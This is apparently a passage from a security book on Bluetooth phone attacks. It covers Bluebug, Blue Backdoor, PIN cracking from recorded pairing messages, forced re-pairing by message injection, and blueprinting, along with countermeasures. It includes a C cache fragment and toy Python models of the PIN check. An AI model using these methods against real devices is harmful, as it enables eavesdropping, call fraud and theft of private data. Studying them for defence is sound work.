 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
 * rev 0.3 (2004/02/14)
 *  - ATE0 to disable echo on ericsson
 *
 * rev 0.2 (2004/02/14)
 *  - set auth & encrypt to off
 *
 * rev 0.1 (2004/02/12)
 *  - initial release
 *
 * TODO: pdu parser for sms
 */

#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <termios.h>
#include <time.h>
#include <unistd.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/rfcomm.h>

/****************************************************/

/* Cache of recently seen device addresses; an entry expires after
 * CACHE_TIMEOUT seconds so that the same phone is not handled twice
 * in quick succession. */
#define CACHE_TIMEOUT	60
#define CACHE_SIZE_MAX	0x10000

struct cache_item {
	bdaddr_t addr;
	time_t time;
	bool valid;
};

static enum {
	MANUF_UNKNOWN,
	MANUF_ERICSSON,
	MANUF_NOKIA,
} manuf;

static struct cache_item cache[CACHE_SIZE_MAX];
static size_t cache_size;	/* number of valid entries in cache[] */

/****************************************************/

/* Store addr in the first free slot and time-stamp it. */
static void bt_cache_add(bdaddr_t *addr)
{
	struct cache_item *item;

	for (item = &cache[0]; item < &cache[CACHE_SIZE_MAX]; item++) {
		if (item->valid)
			continue;
		bacpy(&item->addr, addr);
		item->time = time(NULL);
		item->valid = true;
		cache_size++;
		break;	/* one slot per address; without this every free slot would be filled */
	}
}

/****************************************************/

/* Drop every valid entry older than CACHE_TIMEOUT seconds. */
static void bt_cache_clear(void)
{
	struct cache_item *item;
	time_t now;
	size_t removed = 0;
	size_t count = 0;

	now = time(NULL);

	for (item = &cache[0]; item < &cache[CACHE_SIZE_MAX]; item++) {
		if (count == cache_size)
			break;	/* all valid entries have been visited */
		if (!item->valid)
			continue;
		count++;
		if (now - item->time < CACHE_TIMEOUT)
			continue;
		item->valid = false;
		removed++;
	}

	cache_size -= removed;
}

/****************************************************/

/* Return true if addr is currently cached (seen within the timeout). */
static bool bt_cache_find(bdaddr_t *addr)
{
	struct cache_item *item;
	size_t count = 0;

	for (item = &cache[0]; item < &cache[CACHE_SIZE_MAX]; item++) {
		if (count == cache_size)
			break;
		if (!item->valid)
			continue;
		if (!bacmp(&item->addr, addr))
			return true;
		count++;
	}

	return false;
}

/* remainder of the btxml.c listing not reproduced */
```


 

 

 

 

Countermeasures

Bluesnarfing is probably one of the most dangerous mobile phone related threats because it opens the victim’s private and sensitive data to exploitation. However, it is possible to protect your mobile phone against such attacks by simply following the below steps:

  1. One of the most effective countermeasures against Bluesnarfing is to simply disable Bluetooth on your mobile phone by going into options. Unfortunately, this would also mean that one can no longer use Bluetooth for legitimate purposes with other devices.
  2. However, a more practical countermeasure is to configure your Bluetooth settings and put your phone in the Undiscoverable mode. Once you have paired your mobile phone with any Bluetooth enabled devices or accessories that you want to use it with, then you can set its options to the Undiscoverable mode or hidden mode. This will ensure that when the attacker (who is not in the allowed list) searches for Bluetooth devices, your mobile phone will not show up. At the same time one can continue using Bluetooth on the phone to connect to other devices. Please see the Bluejacking countermeasures to get specific instructions based on your mobile phone manufacturer.
  3. Especially when one is in a crowded public place, one’s level of alertness should only increase. If one sees that the Bluetooth icon on the mobile phone is active, then it means that an attack could be in progress.
  4. Many mobile phone manufacturers have released updates and fixes for vulnerable mobile phone handsets.

 

The Blue Backdoor Attack

In the previous sections, we discussed some of the most common Bluetooth related attacks currently being used by attackers across the world. Another very dangerous attack that exists on many different mobile phones is known as the Blue Backdoor attack. This proof-of-concept Bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two Bluetooth enabled devices. Not only does it give the attacker complete access and control over the target device, but it also allows the attacker to place strategic backdoors for continued access and entry. The attack consists of the following steps:

  1. At any point in time a mobile phone user can easily view the list of currently paired devices by simply going to the Bluetooth settings of the phone. Hence, the user is always aware of all devices with which it is paired. In the Blue Backdoor attack, the attacker connects to the target device in such a manner (maybe using a backdoor or some other vulnerability) that its identity does not come up in the paired devices list even though it is given complete access and privileges.
  2. Such an attack strategy ensures that unless the target user is actually observing the device screen at the exact moment when the attacker connects to it, the user will not suspect that anything out of the ordinary is taking place.
  3. The attacker now has complete access to all resources and data on the target mobile device. Hence, the attacker can access all sensitive data, send/receive SMS text messages, make voice phone calls and access the Internet, etc., without the victim user’s permission. The attacker can then misuse the privileges to open other backdoors or exploit other vulnerabilities.

 

The Bluebug Attack

The Bluebug attack was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of a vulnerable target mobile phone device. In other words, this attack can be used to make phone calls, send SMS/MMS messages, read/add/edit/modify/delete entries in the address book, make use of data services like the Internet, set up call forwards and a lot of other things. According to Adam and Ben Laurie, credited with doing a lot of research on this loophole, the BlueBug attack can be described as:

 

The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off the shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send sms messages, read sms messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, allowing the owner’s incoming calls to be intercepted, either to provide a channel for calls to more extensive destinations or for identity theft by impersonation of the victim.

 

Fadia’s Hot Picks for Popular Bluebug Hacking Tools

  1. Utility Name: BlueBug

Features: Just what the name says!

Download URL: http://www.trifinite.org

 

Other Attacks

Earlier in this chapter, we learnt that before a Bluetooth connection can be successfully established between any two devices, the pairing process has to be completed where the devices exchange their respective pairing codes and a generated encryption key. These keys not only authenticate the two Bluetooth devices, but also help to make the connection exclusive and binding. Unfortunately, both the pairing codes and the encryption key suffer from a variety of vulnerabilities given as follows:

 

  1. Short Pairing Code

The Bluetooth protocol allows applications and devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit long pairing codes. This makes Bluetooth enabled devices that use a short pairing code vulnerable to brute force attacks executed with the help of a Bluetooth enabled computer. Hence, it is possible for a user to forcibly crack the pairing code of a vulnerable device and execute further malicious activities. Unfortunately, most people have the tendency to select and use short pairing codes.

 

  2. Default Pairing Code

Most slave Bluetooth devices like wireless headsets (or devices that do not have keyboards) continue to use default short pairing codes like 0000 or 1111 or 1234. Such pairing codes are extremely easy to crack and can easily be exploited by malicious users. However, it is important to note that a slave Bluetooth device can only have one master Bluetooth device. If successfully executed, such an attack can lead to leakage of conversations or even data.

  3. Random Challenge Response Generators

Many applications restrict the available space from which they choose input values to generate the random challenge responses that make the Bluetooth connection unique and binding. This makes the keys quite vulnerable to brute force attacks. Hence, it is very important for applications to ensure that the input values that are used to generate the challenge responses are random enough.

 

  4. Man-In-Middle Attacks

Bluetooth allows the DESTINATION device to authenticate the identity of the SOURCE device by asking it to compute the challenge response. However, the identity of the DESTINATION is never authenticated by the SOURCE. This makes Bluetooth vulnerable to a number of Man-In-Middle attacks where a malicious attacker can pretend to be an authentic DESTINATION device.

 

  5. Privacy Concerns

A Bluetooth device that is enabled but not currently in use brings a lot of privacy concerns to the forefront. An enabled Bluetooth device is constantly scanning to discover other devices in range or scanning to get discovered by other devices. Unfortunately, this also means that an enabled Bluetooth device is constantly broadcasting its name and IMEI (International Mobile Equipment Identity). This makes the enabled mobile device vulnerable to privacy concerns that can be exploited by malicious users.

 

  6. Brute Force Attacks

A number of people set the mode of their Bluetooth device to Hidden to prevent malicious users from discovering it. Such a strategy also protects the privacy of the user by hiding the MAC address of the Bluetooth enabled device. However, it is possible to brute force the MAC address of a device even if it is in the hidden mode. For example, the Redfang tool is one of the best of such brute force crackers.

 

  7. DOS Attacks

Bluetooth uses radio signals in the 2.4 GHz frequency range. This makes it potentially vulnerable to interference, jamming attacks or DOS attacks by a number of other noisy appliances like phones, microwave ovens and others. Bluetooth uses a process called frequency hopping and keeps changing its operating frequency to make it very difficult for an attacker to carry out a jamming attack.

 

  8. Cracking the Pair Codes

We have already seen how important and integral pair codes are to the Bluetooth communication protocol. Following is an excerpt from a paper titled Cracking the Bluetooth PIN written by Yaniv Shaked and Avishai Wool which explains the process of cracking the PIN of a Bluetooth device in detail.

Overview of Bluetooth Security

This paper deals with the mechanisms used in Bluetooth Security Mode 3: the Link-level Security Mode. In this mode, a Bluetooth device will initiate security measures before a channel is established. This is an in-built mechanism that is used regardless of the application layer security that may also be used. In security mode 3 terminology, establishing a channel between two Bluetooth devices is called pairing or bonding.

The Bluetooth pairing and authentication process.

The Bluetooth initialization procedure consists of 3 or 4 steps given as follows.

  1. Creation of an initialization key (Kinit).
  2. Creation of a link key (Kab).
  3. Authentication.

After the 3 pairing steps are completed, the devices can derive an encryption key to hide all future communication in an optional fourth step.

Before the pairing process can begin, the PIN code must be entered into both Bluetooth devices. Note that in some devices (like wireless earphones) the PIN is fixed and cannot be changed. In such cases, the fixed PIN is entered into the peer device. If two devices have a fixed PIN, they cannot be paired, and therefore, cannot communicate. In the following sections we go into the details of the steps of the pairing process.

 

Creation of Kinit

The Kinit key is created using the E22 algorithm, whose inputs are the following:

  1. A BD_ADDR.
  2. The PIN code and its length.
  3. A 128 bit random number IN_RAND.

This algorithm outputs a 128 bit word, which is referred to as the initialization key (Kinit).

Figure 1.1 describes how Kinit is generated using E22. Note that the PIN code is available at both Bluetooth devices, and the 128 bit IN_RAND is transmitted in plaintext. As for the BD_ADDR: if one of the devices has a fixed PIN, they use the BD_ADDR of the peer device. If both have a variable PIN, they use the PIN of the slave device that receives the IN_RAND. In Figure 1.1, if both devices have a variable PIN, BD_ADDRB shall be used. The Bluetooth device address can be obtained via an inquiry routine by a device. This is usually done before connection establishment begins.

 

After the creation of the link key (Kab), the Kinit key is discarded.

Creation of Kab

After creating the initialization key, the devices create the link key Kab. The devices use the initialization key to exchange two new 128 bit random words, known as LK_RANDA and LK_RANDB. Each device selects a random 128 bit word and sends it to the other device after bitwise xoring it with Kinit. Since both devices know Kinit, each device now holds both random numbers LK_RANDA and LK_RANDB. Using the E21 algorithm, both devices create the link key Kab. The inputs of the E21 algorithm are:

  1. A BD_ADDR.
  2. The 128 bit random number LK_RAND.

Note that E21 is used twice in each device, with two sets of inputs. Figure 1.2 describes how the link key Kab is created.

 

Mutual Authentication

Upon creation of the link key Kab, mutual authentication is performed. This process is based on a challenge-response scheme. One of the devices, the verifier, randomizes and sends (in plaintext) a 128 bit word called AU_RANDA. The other device, the claimant, calculates a 32 bit word called SRES using an algorithm E1. The claimant sends the 32 bit SRES word as a reply to the verifier, who verifies (by performing the same calculations) the response word. If the response word is successful, the verifier and the claimant change roles and repeat the entire process. Figure 1.3 describes the process of mutual authentication. The inputs to E1 are:

  1. The random word AU_RANDA.
  2. The link key Kab.
  3. Its own Bluetooth device address (BD_ADDRB).

 

Note that as a side effect of the authentication process, a 96 bit word called ACO is calculated by both peers. This word is optionally used during the creation of the encryption key. The creation of this encryption key exceeds our primary discussion and shall not be described in this book.

 

 

The Basic Attack

Table 1.2: List of messages sent during the pairing and authentication process

#   Src   Dst   Data        Length    Notes
1   A     B     IN_RAND     128 bit   plaintext
2   A     B     LK_RANDA    128 bit   XORed with Kinit
3   B     A     LK_RANDB    128 bit   XORed with Kinit
4   A     B     AU_RANDA    128 bit   plaintext
5   B     A     SRES        32 bit    plaintext
6   B     A     AU_RANDB    128 bit   plaintext
7   A     B     SRES        32 bit    plaintext

‘A’ and ‘B’ denote the two Bluetooth devices.

Assume that the attacker eavesdropped on an entire pairing and authentication process and saved all the messages (see Table 1.2). The attacker can now use a brute force algorithm to find the PIN used. The attacker enumerates all possible values of the PIN. Knowing IN_RAND and the BD_ADDR, the attacker runs E22 with those inputs and the guessed PIN, and finds a hypothesis for Kinit. The attacker can now use this hypothesis of the initialization key to decode messages 2 and 3. Messages 2 and 3 contain enough information to perform the calculation of the link key Kab, giving the attacker a hypothesis of Kab. The attacker now uses the data in the last 4 messages to test the hypothesis. Using Kab and the transmitted AU_RANDA (message 4), the attacker calculates SRES and compares it to the data of message 5. If necessary, the attacker can use the value of messages 6 and 7 to reverify the hypothesis Kab until the correct PIN is found. Figure 1.4 describes the entire process of PIN cracking.

Note that the attack, as described, is only fully successful against PIN values of fewer than 64 bits. If the PIN is longer, then with high probability there will be multiple PIN candidates, since the two SRES values only provide 64 bits of data to test against. A 64 bit PIN is equivalent to a 19 decimal digits PIN.
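The exchange of Table 1.2 and the key derivation chain described above, as an added toy model that is not code from the book or from the Shaked/Wool paper. Assumptions: HMAC-SHA256 stands in for the SAFER+ based E22, E21 and E1, the addresses and PIN are constructed sample values, and B is the slave whose BD_ADDR feeds E22. The point it makes concrete is the one the excerpt relies on: every recorded message is either plaintext or masked only with Kinit, so the PIN is the sole secret input, and a transcript can be checked against any single PIN hypothesis with a few hash calls, which is why short or fixed PINs give no protection.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


def _prf(label: bytes, key: bytes, *parts: bytes) -> bytes:
    """Keyed stand-in for E22/E21/E1 (assumption: HMAC-SHA256, not SAFER+)."""
    h = hmac.new(key, label, hashlib.sha256)
    for p in parts:
        h.update(p)
    return h.digest()


def e22(bd_addr: bytes, pin: bytes, in_rand: bytes) -> bytes:
    """Toy E22: Kinit from a BD_ADDR, the PIN with its length, and IN_RAND."""
    return _prf(b"E22", pin, bytes([len(pin)]), bd_addr, in_rand)[:16]


def e21(bd_addr: bytes, lk_rand: bytes) -> bytes:
    """Toy E21: one device's 128-bit contribution to the link key."""
    return _prf(b"E21", lk_rand, bd_addr)[:16]


def e1(kab: bytes, au_rand: bytes, claimant_addr: bytes) -> bytes:
    """Toy E1: 32-bit SRES from link key, challenge and the claimant's address."""
    return _prf(b"E1", kab, au_rand, claimant_addr)[:4]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass
class Transcript:
    """Everything an eavesdropper records: the seven messages of Table 1.2
    plus the two device addresses learned from the inquiry phase."""
    bd_addr_a: bytes
    bd_addr_b: bytes
    in_rand: bytes    # msg 1, plaintext
    m2: bytes         # msg 2: LK_RANDA XOR Kinit
    m3: bytes         # msg 3: LK_RANDB XOR Kinit
    au_rand_a: bytes  # msg 4, plaintext (A is verifier)
    sres_b: bytes     # msg 5, B's 32-bit response
    au_rand_b: bytes  # msg 6, plaintext (roles swapped)
    sres_a: bytes     # msg 7, A's 32-bit response


def derive_kab(kinit: bytes, m2: bytes, m3: bytes,
               bd_addr_a: bytes, bd_addr_b: bytes) -> bytes:
    """Unmask both LK_RAND words with Kinit and combine them as Kab (E21 twice)."""
    lk_rand_a = xor(m2, kinit)
    lk_rand_b = xor(m3, kinit)
    return xor(e21(bd_addr_a, lk_rand_a), e21(bd_addr_b, lk_rand_b))


def pair(pin: bytes, bd_addr_a: bytes, bd_addr_b: bytes, rng=os.urandom):
    """Run pairing and mutual authentication between A and B (both know the
    PIN). Returns the shared Kab and the transcript an observer would record."""
    in_rand = rng(16)
    kinit = e22(bd_addr_b, pin, in_rand)          # both sides compute the same Kinit
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    m2, m3 = xor(lk_rand_a, kinit), xor(lk_rand_b, kinit)
    kab = derive_kab(kinit, m2, m3, bd_addr_a, bd_addr_b)
    au_rand_a, au_rand_b = rng(16), rng(16)       # A challenges B, then B challenges A
    sres_b = e1(kab, au_rand_a, bd_addr_b)
    sres_a = e1(kab, au_rand_b, bd_addr_a)
    return kab, Transcript(bd_addr_a, bd_addr_b, in_rand, m2, m3,
                           au_rand_a, sres_b, au_rand_b, sres_a)


def pin_explains_transcript(t: Transcript, pin_guess: bytes) -> bool:
    """True if this PIN reproduces both observed SRES values. Only the PIN is
    missing from the transcript, so this is all a 64-bit check ever needs."""
    kinit = e22(t.bd_addr_b, pin_guess, t.in_rand)
    kab = derive_kab(kinit, t.m2, t.m3, t.bd_addr_a, t.bd_addr_b)
    return (e1(kab, t.au_rand_a, t.bd_addr_b) == t.sres_b and
            e1(kab, t.au_rand_b, t.bd_addr_a) == t.sres_a)


if __name__ == "__main__":
    # Constructed sample addresses and a weak 4-digit PIN for the demonstration.
    A, B = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    kab, t = pair(b"1234", A, B)
    print("Kab:", kab.hex())
    print("correct PIN consistent:", pin_explains_transcript(t, b"1234"))
    print("wrong PIN consistent:  ", pin_explains_transcript(t, b"0000"))
```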

 

Implementation

This section describes our implementation of the PIN cracking attack, through several optimization versions. We implemented all the versions in C with some embedded 80x86 assembly instructions. We used the Microsoft VC++ compiler on a PC running Microsoft Windows 98.

The Baseline

Before writing optimized versions of the code, we established two baseline implementations for comparison purposes, as follows.

The `as-is’ version

This version is a non-optimized implementation of the attack, using C code only. The bias vectors which are used during the SAFER+ key scheduling algorithm are calculated offline, and the substitution boxes e and l are implemented using two pre-calculated look-up tables.

The Basic Version

This version is identical to the `as-is’ version, but with compiler optimizations to yield maximal speed [compile option /O2].

Improved KSA and Expansion

Our first optimization technique focuses on the SAFER+ Key Scheduling Algorithm (KSA). We identified two effective optimizations in the KSA which are as follows:

  1. Caching the calculation result of the expansion operation in the E21 and E22 algorithms on the BD_ADDR of both peers. Since the input of BD_ADDR to E21 and E22 is nearly static (only two values of BD_ADDR are used during the PIN cracking attack), it is possible to perform the calculation of Expansion (BD_ADDR, 6) only once, and save the result for later use.
  2. Enhancements of the implementation of the key scheduling algorithm. We found that the implementation of the byte-rotate operation using C code is expensive. Instead we used inline assembly code which employed the ROL instruction. Furthermore, we found that the modulo 17 operation used to extract specific bytes from a batch of 17 bytes during the key scheduling algorithm is very expensive. Instead, we used a pre-calculated look-up table.

 

PHT as Look-up Table

In this version we used a large look-up table to implement the Pseudo Hadamard Transformation (PHT) operation, which is used 32 times during a single SAFER+ round. The look-up table is 65,536 entries long, since the transformation receives two bytes (2^8) and replaces them. The routine which implements the use of such a look-up table was written in pure assembly code. The look-up table was pre-calculated offline.

Algebraic Manipulation

Our most interesting and most effective optimization is the algebraic manipulation of the SAFER+ round. A key observation is that almost the entire SAFER+ round (except the look-up tables e and l and the key addition steps) can be implemented as a 16 x 16 matrix multiplying the vector of 16 input bytes (all operations modulo 256). This is possible since the operations used in the Armenian shuffles and Pseudo Hadamard Transformations are linear. By tracing back through the Shuffles and PHT boxes we computed the 16 x 16 matrix coefficients as follows:

 

Our goal is to implement the multiplication (a 16 coefficients vector by a 16 x 16 matrix) faster than the traditional implementation of the Armenian shuffles and the PHT. A naive implementation of multiplying the vector with each column of the matrix would have taken 16 multiplication operations and 16 add operations for each column; 32 operations for each column, yielding 512 operations for the entire matrix (plus load and store operations). Such an implementation is slower than the traditional one. We found that each PHT box consists of 7 operations and the Armenian shuffle consists of 32 operations. This yields 320 operations for the traditional implementation (32 PHT boxes and 3 Armenian shuffles).

However, a careful examination of the above matrix shows that we can do much better. A much faster implementation is possible because the matrix has a great deal of structure, and because all the coefficients are powers of 2.

Observe that every pair of consecutive columns, starting with the two leftmost columns, is identical in half of their coefficients. All other coefficients in the left column are equal to twice the value of the coefficients in the right column. This structure is very useful, since the result of multiplication of half the column can be used in both columns. Furthermore, the product of the other coefficients can be calculated once and used for both columns, since they differ only by a factor of 2.

The fact that the coefficients are all powers of 2 is also helpful, since instead of using multiplication operations, the calculation is done using a shift left operation.

The next pseudo code depicts the calculation procedure for two columns. Note the saving in shift operations, done by arranging the add operations in an appropriate manner. The input vector is denoted by X = (x0, ..., x15), and we show the calculation of the outputs y0 and y1 as follows:

h1 = x1 + x2 + x3 + x6 + x7 + 2(x0 + x5 + 2(x4))
h2 = x8 + x9 + x11 + 2(x10 + x12 + x13 + 2(x15 + 2(x14)))
y1 = h1 + h2
y0 = y1 + h2

How fast is the new implementation?

This implementation consists of 5 shift left operations, 16 add operations, 2 load operations and 2 store operations. This yields 25 operations per 2 columns, 200 operations for the entire matrix multiplication, 30 per cent fewer than needed in the normal implementation.
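The two-column calculation above, as an added Python example that is not the authors' cracking code: it evaluates h1, h2, y1 and y0 exactly as in the pseudo code with byte arithmetic modulo 256, and checks the result against a plain multiply-and-add of the two column coefficient vectors, which are read off the h1/h2 formulas because the full matrix is not reproduced on this page.

```python
# Added example (not the authors' cracking code): the two-column,
# shift-and-add evaluation of the SAFER+ linear layer from the pseudo code,
# checked against a naive per-column multiply-and-add.  All arithmetic is
# on bytes, i.e. modulo 256.

# Coefficients of the two leftmost matrix columns, derived from the h1/h2
# formulas (y1 = h1 + h2, y0 = h1 + 2*h2); entry i multiplies x_i.
# The first eight entries are shared by both columns and the last eight
# are doubled in the y0 column, which is the structure the text exploits.
COL_Y1 = [2, 1, 1, 1, 4, 2, 1, 1, 1, 1, 2, 1, 2, 2, 8, 4]
COL_Y0 = [2, 1, 1, 1, 4, 2, 1, 1, 2, 2, 4, 2, 4, 4, 16, 8]


def naive_column(x, coeffs):
    """Plain dot product: 16 multiplications and 16 additions per column."""
    return sum(c * xi for c, xi in zip(coeffs, x)) & 0xFF


def fast_two_columns(x):
    """Return (y0, y1) using 5 left shifts and 16 additions in total.

    h1 is the half of the column that both outputs share; h2 is the half
    whose coefficients differ by a factor of two, so it is computed once
    and added a second time for y0.  Every coefficient is a power of two,
    so each multiplication becomes a left shift by one.
    """
    h1 = x[1] + x[2] + x[3] + x[6] + x[7] + ((x[0] + x[5] + (x[4] << 1)) << 1)
    h2 = x[8] + x[9] + x[11] + (
        (x[10] + x[12] + x[13] + ((x[15] + (x[14] << 1)) << 1)) << 1
    )
    y1 = (h1 + h2) & 0xFF
    y0 = (y1 + h2) & 0xFF
    return y0, y1


def matches_naive(x):
    """True if the fast form agrees with the naive columns for input x."""
    y0, y1 = fast_two_columns(x)
    return y0 == naive_column(x, COL_Y0) and y1 == naive_column(x, COL_Y1)


if __name__ == "__main__":
    # Constructed sample input, the bytes 0..15; the wrap-around in y0
    # shows the modulo-256 reduction at work.
    sample = list(range(16))
    print(fast_two_columns(sample), matches_naive(sample))  # (73, 59) True
```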

Results

  This subsection presents the cracking time of the five versions. All the versions were run on an old Pentium III 450MHz Personal Computer. For each version we tried several PIN sizes, ranging from 4 to 7 decimal digits.

Figure 1.5 compares the results obtained from all five versions. The Y axis denotes the running time in seconds (logarithmic scale), and the X axis denotes the number of decimal digits the PIN contains.

The final version improves the cracking speed by a factor of 10 and brings the time to crack a 4-digit PIN down to 0.27 sec. To gain some insight on how the attack improves with stronger hardware, we also ran our best attack version on a Pentium IV 3Ghz HT. On this computer we were able to crack a 4-digit PIN in 63 msec (see Table 1.3), 4 times faster than on the Pentium III. This makes the attack near-real-time.

Table 1.3: Summary of results obtained running the last version on a Pentium IV 3Ghz HT computer

PIN Length (digits)    Time (seconds)
4                      0.063
5                      0.75
6                      7.609
7                      76.127

The Re-Pairing Attack

Background and Motivation: This section describes an additional attack on Bluetooth devices that is useful when used in conjunction with the primary attack described earlier. Recall that the primary attack is only applicable if the attacker has eavesdropped on the entire process of pairing and authentication. This is a major limitation since the pairing process is rarely repeated. Once the link key Kab is created, each Bluetooth device stores it for possible future communication with the peer device. If at a later point in time the device initiates communication with the same peer, the stored link key is used and the pairing process is skipped. Our second attack exploits the connection establishment protocol to force the communicating devices to repeat the pairing process. This allows the attacker to record all the messages and crack the PIN using the primary attack described in this book.

Attack Details: Assume that two Bluetooth devices that have already been paired before now intend to establish communication again. This means that they do not need to create the link key Kab again, since they have already created and stored it before. They proceed directly to the Authentication phase (see Figure 1.3). We describe three different methods that can be used to force the devices to repeat the pairing process. The efficiency of each method depends on the implementation of the Bluetooth core in the device under attack. These methods appear in order of efficiency:

  1. Since the devices skipped the pairing process and proceeded directly to the Authentication phase, the master device sends the slave an AU_RAND message and expects the SRES message in return. Note that Bluetooth specifications allow a Bluetooth device to forget a link key. In such a case, the slave sends an LMP_not_accepted message in return, to let the master know it has forgotten the link key. Therefore, after the master device has sent the AU_RAND message to the slave, the attacker injects an LMP_not_accepted message towards the master. The master will be convinced that the slave has lost the link key and pairing will be restarted. Restarting the pairing procedure causes the master to discard the link key. This assures pairing must be done before devices can authenticate again.
  2. At the beginning of the Authentication phase, the master device is supposed to send the AU_RAND to the slave. If before doing so, the attacker injects a IN_RAND message toward the slave, the slave device will be convinced that the master has lost the link key and pairing is restarted. This will cause the connection establishment to restart.
  3. During the Authentication phase, the master device sends the slave an AU_RAND message and expects a SRES message in return. If, after the master has sent the AU _RAND message, an attacker injects a random SRES message toward the master, this will cause the Authentication phase to restart, and repeated attempts will be made. At some point, after a certain number of failed authentication attempts, the master device is expected to declare that the authentication procedure has failed (implementation dependent) and initiate pairing.

The three methods described above cause one of the devices to discard the link key. This assures that the pairing process will occur during the connection establishment, so the attacker will be able to eavesdrop on the entire process and use the method described earlier to crack the PIN.

In order to make the attack ‘online’, the attacker can save all the messages transferred between the devices after the pairing is complete. After breaking the PIN (0.06-0.3 sec for a 4 digit PIN), the attacker can decode the saved messages, and continue to eavesdrop and decode the communication on the run. Since Bluetooth supports a bit rate of 1 Megabit per second, a 40KB buffer is more than enough for the common case of a 4 digit PIN.

 

Note:

  1. The Bluetooth specification does allow devices to forget link keys and to require repeating the pairing process. This fact makes the re-pairing attack applicable.
  2. Re-pairing is an active attack that requires the attacker to inject a specific message at a precise point in the protocol. This in most cases requires a custom Bluetooth device, since off-the-shelf components will be unable to support such behaviour.
  3. If the slave device verifies that the message it receives is from the correct BD_ADDR, then the attack requires the injected message to have its source BD_ADDR ‘spoofed’, again requiring custom
  4. If the attack is successful, the Bluetooth user will need to enter the PIN again — so a suspicious user may realize that his Bluetooth device is under attack and refuse to enter the PIN.

Countermeasures

This section details the countermeasures one should consider when using a Bluetooth device. These countermeasures will reduce the probability of being subjected to both attacks and the vulnerability to these attacks.

Since Bluetooth is a wireless technology, it is very difficult to prevent the Bluetooth signal from leaking outside the desired boundaries. Therefore, one should follow the recommendation in the Bluetooth standard and refrain from entering the PIN into the Bluetooth device for pairing as much as possible. This reduces the risk of an attacker eavesdropping on the pairing process and finding the PIN used.

Most Bluetooth devices save the link key (Kab) in non-volatile memory for future use. This way, when the same Bluetooth devices wish to communicate again, they use the stored link key. However, there is another mode of work, which requires entering the PIN into both devices every time they wish to communicate, even if they have already been paired before. This mode gives a false sense of security! Starting the pairing process every time increases the probability of an attacker eavesdropping on the messages transferred. We suggest not to use this mode of work.

Finally, the PIN length ranges from 8 to 128 bits. Most manufacturers use a 4 digit PIN and supply it with the device. Obviously, customers should demand the ability to use longer PINs.

(i) Unit Key Attacks

Several Bluetooth enabled devices use one unit key for connections with all other devices. This means that the same unit key has to be shared and sent to all devices with which it communicates. Hence, all trusted devices that communicate with such Bluetooth devices will have access to its unit key. It is possible for a trusted device to impersonate the identity of a vulnerable device and eavesdrop on all data transfer. Although unit keys are not recommended by the latest Bluetooth implementation, they still exist to provide backward compatibility.

(j) Impersonation Attacks

A variety of different impersonation attacks are possible against Bluetooth, wherein the attacker pretends to be a trusted mobile device and establishes a connection with the target mobile device.

 

Blueprinting

Information gathering is every computer criminal’s first step in the quest to break into a target system. It is very important for all computer criminals to spend some time on finding information on the target computer. This can be done through numerous information gathering techniques like fingerprinting and so on. Even Bluetooth devices can be fingerprinted or probed for information using a technique known as Blueprinting. In other words, Blueprinting is the technique of sending data to a Bluetooth enabled device and recording the responses received. These recorded responses can then be utilized to determine various information about the Bluetooth enabled device, including the manufacturer, device model and version. A very good analogy to understand Blueprinting is that of Internet Protocol (IP) fingerprinting. Every single computer on the Internet has characteristics unique to it, like its IP address, operating system and the other services found running on it. This unique information about a remote computer can easily be found with the help of IP fingerprinting tools (like nmap). Similarly, what IP fingerprinting is to a remote computer, Blueprinting is to remote Bluetooth enabled devices. Every Bluetooth enabled device too has unique characteristics (like manufacturer, model and software information) that can be found out using Blueprinting.

It is important to understand that every single Bluetooth enabled device has unique characteristics associated with it. For example, every Bluetooth device has a unique 48-bit long Bluetooth device address of the form MM:MM:MM:XX:XX:XX, where the M’s part identifies the manufacturer and the X’s part varies from device to device. For example, an address whose M’s part is 00:60:57 always represents a Nokia mobile phone. Such unique information about a remote Bluetooth device can easily be found out with the help of Blueprinting by observing the following main steps:

Step 1: ATTACKER  ---- Sends Probe ---->  BLUETOOTH DEVICE

Step 2: BLUETOOTH DEVICE  ---- Sends back Hash ---->  ATTACKER

Step 3: The received hash is studied and compared to the known hashes chart given in Table 1.4 to identify unique characteristics of the remote Bluetooth device.

Table 1.4: Hashes Chart

Blueprinting Hash    Manufacturer     Model               Firmware
00:0A:95@1114112     Apple            Wireless Keyboard   Unknown
00:01:EC@2359452     Ericsson         T39M                Unknown
00:30:6E@269099048   HP               Bt130               Unknown
08:00:28@3342638     HP               iPAQ h6315          Initial Firmware
08:00:17@2949325     HP               iPAQ 5500           PocketPC (4.20.1081)
00:0C:55@983040      Microsoft        Windows XP          SP2
C6:F7:4A@655407      Motorola         A1000               Unknown
00:0A:28@1769675     Motorola         V600                Unknown
00:60:57@1704044     Nokia            3650                Unknown
00:60:57@1704020     Nokia            3650                Unknown
00:60:57@1704022     Nokia            3650                Unknown
00:60:57@1704023     Nokia            3650                Unknown
00:60:57@3605290     Nokia            6310i               Unknown
00:60:57@3607710     Nokia            6310i               Unknown
00:60:57@3604685     Nokia            6310/6310i          Unknown
00:60:57@2621543     Nokia            6310/6310i          Unknown
00:0E:ED@4391166     Nokia            6320                Unknown
00:60:57@1704035     Nokia            6600                Unknown
00:60:57@1704034     Nokia            6600                Unknown
00:02:EE@4391166     Nokia            6820                Unknown
00:60:57@4128974     Nokia            7600                Unknown
00:60:57@1507391     Nokia            7650                Unknown
